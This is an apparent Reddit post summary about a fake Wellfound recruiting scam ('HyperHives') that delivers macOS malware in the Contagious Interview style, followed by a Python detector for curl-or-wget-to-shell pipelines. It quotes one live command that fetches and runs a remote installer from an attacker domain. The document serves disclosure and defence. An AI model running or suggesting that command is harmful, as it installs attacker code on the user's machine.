Wellfound fake job interview malware, HyperHives Contagious Interview style

April 7, 2026 · r/hacking, r/malware

In r/hacking and r/malware, a fake recruiting flow on Wellfound delivers a macOS shell-piped installer, and the victim reverse-engineers it to extract config and infrastructure, tying it to the Contagious Interview tradecraft.

Got a Wellfound job offer from “Felix” at “HyperHives.” Looked legit.
Then they asked me to “review the product” before the call. Visiting their site triggered:
curl -s https://macos.hyperhives.net/install | nohup bash &
571 encrypted config values decrypted, C2 and Sentry DSN exposed, DPRK/Contagious Interview attribution.
Tags: social engineering, reverse engineering, macOS
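
A defender's view of the delivery step quoted above, as an added example that is not part of the original post: a Python check that flags command lines where a downloader's output is piped straight into a shell interpreter, and records whether that shell was detached with nohup and backgrounded. The function names, the keyword sets and every sample line other than the quoted command are assumptions made for illustration.

```python
import shlex
from os.path import basename
from urllib.parse import urlparse

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh", "dash", "ksh"}
WRAPPERS = {"nohup", "sudo", "env"}   # words that may precede the interpreter
PIPES, ENDS = {"|", "|&"}, {";", "&", "&&", "||"}

def inspect(stages, backgrounded):
    """Flag a downloader stage whose output reaches a shell interpreter."""
    out = []
    for i, src in enumerate(stages):
        if not src or basename(src[0]) not in DOWNLOADERS:
            continue
        urls = [t for t in src[1:] if urlparse(t).scheme in ("http", "https")]
        for sink in stages[i + 1:]:
            names = [basename(t) for t in sink]
            prog = [n for n in names if n not in WRAPPERS]   # interpreter comes first
            if prog and prog[0] in SHELLS:
                out.append({"host": urlparse(urls[0]).hostname if urls else None,
                            "shell": prog[0], "detached": "nohup" in names,
                            "backgrounded": backgrounded})
    return out

def find_piped_installs(cmdline):
    """Return one finding per 'downloader | shell' pipeline in a command line."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars="|&;")
    lex.whitespace_split = True           # keep URLs and flags as single tokens
    lex.commenters = ""                   # '#' in a URL must not truncate the line
    try:
        tokens = list(lex)
    except ValueError:                    # unbalanced quotes: not a parseable command
        return []
    findings, stages, cur = [], [], []
    for tok in tokens + [";"]:            # sentinel flushes the final command
        if tok not in PIPES | ENDS:
            cur.append(tok)
            continue
        stages, cur = stages + [cur], []
        if tok in ENDS:
            findings += inspect(stages, backgrounded=(tok == "&"))
            stages = []
    return findings

SAMPLES = [  # constructed, except the first, which is the command quoted in the post
    "curl -s https://macos.hyperhives.net/install | nohup bash &",
    "curl -fsSL 'https://example.invalid/setup.sh'|sh",
    "curl -s https://example.invalid/api | jq .",
]
```

Run over shell history or process command-line telemetry, the first sample yields host macos.hyperhives.net with both the detached and backgrounded flags set; the jq pipeline yields nothing.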
